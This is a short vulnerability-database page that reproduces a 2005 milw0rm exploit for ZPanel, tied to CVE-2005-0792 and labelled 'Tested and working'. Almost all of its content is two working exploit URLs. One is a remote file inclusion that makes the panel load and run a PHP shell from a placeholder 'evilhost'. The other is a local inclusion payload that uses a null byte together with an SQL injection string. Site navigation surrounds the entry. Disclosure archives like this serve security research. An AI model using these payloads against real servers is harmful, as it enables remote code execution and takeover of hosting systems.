Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2005-0792

Publish Date: 15 Mar 2005

Author: Mikhail

                							

                # Tested and working /str0ke

It is possible to include arbitrary file:
local - in version ZPanel &lt;= 2.5 beta 10,
remote - in ZPanel 2.0.

[exploit for v 2.0]
http://localhost/zpanel/zpanel.php?page=http://evilhost/shell
where http://evilhost/shell.php - evil php code script

[exploit for v 2.5 beta]
http://localhost/zpanel/zpanel.php?page=billinginfo/index.php%00'%20OR%20'1'='1


# milw0rm.com [2005-03-15]

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

ZPanel 2.5 - SQL Injection

Vulmon Search

About

Products

Connect